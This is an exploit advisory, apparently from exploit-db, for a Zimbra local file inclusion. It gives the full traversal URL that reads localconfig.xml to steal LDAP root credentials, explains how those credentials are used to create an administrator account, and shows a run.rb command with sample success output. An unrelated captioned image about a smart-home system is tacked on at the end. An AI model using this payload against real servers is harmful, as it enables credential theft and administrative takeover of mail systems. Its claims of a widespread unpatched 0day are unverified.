<code># Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI</code>
<code># Date: 06 Dec 2013</code>
<code># Exploit Author: rubina119</code>
<code># Contact Email : rubina119[at]gmail.com</code>
<code># Vendor Homepage: http://www.zimbra.com/</code>
<code># Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,</code>
<code># Tested on: Centos(x), Ubuntu.</code>
<code># CVE : No CVE, no patch just 0Day</code>
<code># State : Critical</code>
<code> </code>
<code># Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip</code>
<code>---------------Description-----------------</code>
<code>This script exploits a Local File Inclusion in</code>
<code>/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz</code>
<code>which allows us to see localconfig.xml</code>
<code>that contains LDAP root credentials wich allow us to make requests in</code>
<code>/service/admin/soap API with the stolen LDAP credentials to create user</code>
<code>with administration privlegies</code>
<code>and gain acces to the Administration Console.</code>
<code>LFI is located at :</code>
<code>/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00</code>
<code>Example :</code>
<code>https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00</code>
<code>or</code>
<code>https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00</code>
<code>----------------Exploit-----------------</code>
<code>Before use this exploit, target server must have admin console port open</code>
<code>"7071" otherwise it won't work.</code>
<code>use the exploit like this :</code>
<code>ruby run.rb -t mail.example.com -u someuser -p Test123_23</code>
<code>[*] Looking if host is vuln....</code>
<code>[+] Host is vuln exploiting...</code>
<code>[+] Obtaining Domain Name</code>
<code>[+] Creating Account</code>
<code>[+] Elevating Privileges</code>
<code>[+] Login Credentials</code>
<code> </code><code>[*] Login URL : https://mail.example.com:7071/zimbraAdmin/</code>
<code> </code><code>[*] Account : [email protected]</code>
<code> </code><code>[*] Password : Test123_23</code>
<code>[+] Successfully Exploited !</code>
<code>The number of servers vuln are huge like 80/100.</code>
<code>This is only for educational purpouses.</code>
![基于華為物聯網雲平台設計的智能家居控制系統(STM32+ESP8266)[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)